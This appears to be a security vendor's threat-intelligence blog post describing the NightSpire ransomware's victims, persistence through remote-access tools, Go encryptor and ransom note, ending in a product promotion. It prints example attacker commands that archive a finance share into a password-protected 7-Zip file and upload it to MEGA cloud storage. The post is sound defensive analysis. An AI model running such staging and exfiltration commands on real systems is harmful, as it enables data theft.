NightSpire Ransomware Attack Chain, Tools and Tactics

Umut Bayram | 5 MIN READ

| May 23, 2026

Key Takeaways

  • NightSpire is a ransomware family first identified in early 2025 using double extortion, stealing files before encryption and threatening to leak them on a Tor-based site if victims refuse to pay.
  • Between March and June 2025, NightSpire hit at least 64 organizations across 33 countries, with the U.S. leading the victim list, followed by Turkey, Hong Kong, Japan, Taiwan, Mexico, Spain, and Egypt.
  • The encryptor is a Go-based executable. It scans directories, appends the .nspire extension to affected files, and drops a ransom note in every folder with encrypted content.
  • Operators use legitimate tools for stealth, including Chrome Remote Desktop and AnyDesk for persistence, Everything for file discovery, 7-Zip for archiving, and MEGAsync for exfiltration to MEGA cloud storage.
  • You validate your defenses against NightSpire using the Picus Security Validation Platform, which includes threats 79926 (NightSpire Ransomware Download Threat) and 95001 (NightSpire Ransomware Email Threat) in the Picus Threat Library.

NightSpire is an emerging ransomware family first identified in early 2025, employing traditional double extortion techniques: sensitive files are stolen before encryption takes place, and in case of refusal of ransom, the criminals threaten to dump the stolen files on their Tor-based leak website. While impact distribution is global, the U.S. tops the list, followed by Turkey, Hong Kong, Japan, Taiwan, Mexico, Spain, and Egypt [1].

In just the three months between March and June 2025, the threat actors have already compromised at least 64 organizations across 33 countries by mid-2025. The attacks target a broad array of industries, from healthcare, education, and governmental institutions, to finance, manufacturing, hospitality, IT services, and logistics.

The encryption itself is executed via an executable written in Go. The application scans directories, appends the .nspire file extension to all impacted files, and places a ransom message within each affected folder. What should be highlighted here is that the malware goes beyond regular local directories and also encrypts OneDrive files on their way to the cloud storage service.

In this blog, you will learn how NightSpire operates, which tools and techniques the attackers use across the intrusion chain, and how to validate your defenses against this threat.

How Does NightSpire Ransomware Work?

Persistence Through Remote Access Tools

In the March 2026 intrusion, the threat actor reached an endpoint over Remote Desktop Protocol (RDP) [2].

Instead of building its own persistence mechanisms, the attacker relied on remote administration programs that were installed to facilitate ongoing access.

For instance, Chrome Remote Desktop was deployed on at least two compromised machines. The malware created a persistent Windows service named "Chrome Remote Desktop Service," which ran using the following command:

"C:\Program Files (x86)\Google\Chrome Remote Desktop\147.0.7727.3\remoting_host.exe" --type=daemon --host-config="C:\ProgramData\Google\Chrome Remo..."

The Google account tied to this deployment was prince1990905@gmail[.]com [2].

On a separate endpoint, AnyDesk was used. In this case, it created both a Windows service ("AnyDesk Service") and a shortcut (anydesk.lnk) in the Startup folder to enable auto-starting upon boot-up.

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

Usage of legitimate tools gave the threat actors an extra layer of stealth.

Discovery, Data Collection and Exfiltration

Upon establishing footholds, the actor introduced a range of freely available utilities for discovering and collecting sensitive data. The tools are explained below:

  • Everything (voidtools): It is a file discovery tool that allows scanning entire drives for files in just a few moments. After launching the utility, the attacker used its graphical user interface to search and discover files.
  • 7-Zip: It was used to compress selected folders from targeted folders to archives and reduce the total number of files that need to be exfiltrated.
  • MEGAsync was run on the compromised endpoint to transfer the staged 7-Zip archives to the MEGA cloud storage service.

The example commands which attacker might run are given below:

# Launch Everything to search the file system
"C:\Program Files\Everything\Everything.exe"

# Archive a target folder into a password-protected 7-Zip file for staging
"C:\Program Files\7-Zip\7z.exe" a -tzip -p<PASSWORD> -mx5 C:\Users\<USER>\Downloads\data.zip "C:\Shares\Finance\*"

# Upload the staged archive to MEGA cloud storage
"C:\Users\<USER>\AppData\Local\MEGAsync\MEGAsync.exe" /upload "C:\Users\<USER>\Downloads\data.zip"

Execution and Encryption

The NightSpire encryptor is a portable executable written in Go [3]. Go binaries are statically linked and ship with their own runtime, which has two consequences worth noting:

  1. The same source can be compiled for Windows, Linux, and macOS with minimal effort, giving operators cross-platform flexibility.
  2. The compiled binaries are relatively large and contain characteristic strings that make the language easy to identify from static analysis.

On execution, the encryptor immediately opens a console window using conhost.exe (the standard Windows host process for console applications) and begins enumerating directories on the system. During this pass, it walks through every accessible drive letter and path it can see, building the list of files it will encrypt.

Each encrypted file is renamed with a .nspire extension appended to the original filename. A ransom note is written into every directory that contains encrypted files.

In the ransom note, the threat actor indicated that they also encrypted OneDrive files [3]:

Hi, Your hotel is hacked!

Your servers and files are locked and copied.

====================================

REMEMBER!

We also locked files in OneDrive.

And we did not change the extensions of files in OneDrive.

====================================

...

How Picus Simulates NightSpire Ransomware Attacks?

We also strongly suggest simulating NightSpire Ransomware Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as Warlock, BlackCat, Black Basta, and Akira, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the NightSpire Ransomware Attacks:

Threat ID

Threat Name

Attack Module

79926

NightSpire Ransomware Download Threat

Network Infiltration

95001

NightSpire Ransomware Email Threat

E-mail Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] “NightSpire Ransomware.” Accessed: Apr. 22, 2026. [Online]. Available: https://www.broadcom.com/support/security-center/protection-bulletin/nightspire-ransomware

[2] H. Carvey and L. O'Donnell-Welch, "Decoding NightSpire: Ransomware IOCs aren't set in stone," Huntress, Apr. 22, 2026. [Online]. Available: https://www.huntress.com/blog/nightspire-ransomware

[3] "NightSpire ransomware encrypts cloud-stored OneDrive files," SonicWall, Apr. 22, 2026. [Online]. Available: https://www.sonicwall.com/blog/nightspire-ransomware-encrypts-onedrive-files

 
NightSpire is a ransomware family first identified in early 2025. Operators use double extortion, stealing sensitive files before encryption and threatening to publish them on a Tor-based leak site if victims refuse to pay. The encryptor is written in Go, appends the .nspire extension to affected files, and drops a ransom note in every folder holding encrypted content.
Between March and June 2025, NightSpire compromised at least 64 organizations across 33 countries. Over 45 victims were logged on the group's own leak blog by mid-2025. The United States leads the victim list, followed by Turkey, Hong Kong, Japan, Taiwan, Mexico, Spain, and Egypt. Targeted industries include healthcare, education, government, finance, manufacturing, hospitality, IT services, and logistics.
Attackers reach endpoints through Remote Desktop Protocol, then install legitimate remote administration tools for persistence. Chrome Remote Desktop runs as a Windows service named "Chrome Remote Desktop Service." AnyDesk installs both a Windows service and a shortcut in the Startup folder for auto-launch at boot. Using legitimate tools gives attackers an added layer of stealth.
Operators rely on freely available utilities. Everything by voidtools scans entire drives within seconds to locate sensitive files. 7-Zip compresses target folders into password-protected archives for staging. MEGAsync then uploads the staged archives to MEGA cloud storage. This toolchain helps reduce the number of files transferred and blends with normal user activity.
On execution, the Go-based encryptor opens a console window through conhost.exe and enumerates every accessible drive and path. It builds a file list, encrypts each target, and appends the .nspire extension to original filenames. A ransom note lands in every directory containing encrypted files. NightSpire also encrypts OneDrive files without changing their extensions.
Go binaries are statically linked and ship with their own runtime. The same source compiles for Windows, Linux, and macOS with minimal effort, giving operators cross-platform flexibility. Compiled binaries run large and contain characteristic strings, making the language straightforward to identify through static analysis.
You can validate defenses against NightSpire through the Picus Security Validation Platform. The Picus Threat Library includes threat ID 79926 for the NightSpire Ransomware Download Threat and threat ID 95001 for the NightSpire Ransomware Email Threat. You can also test defenses against variants like Warlock, BlackCat, Black Basta, and Akira within minutes.

Table of Contents

Ready to start? Request a demo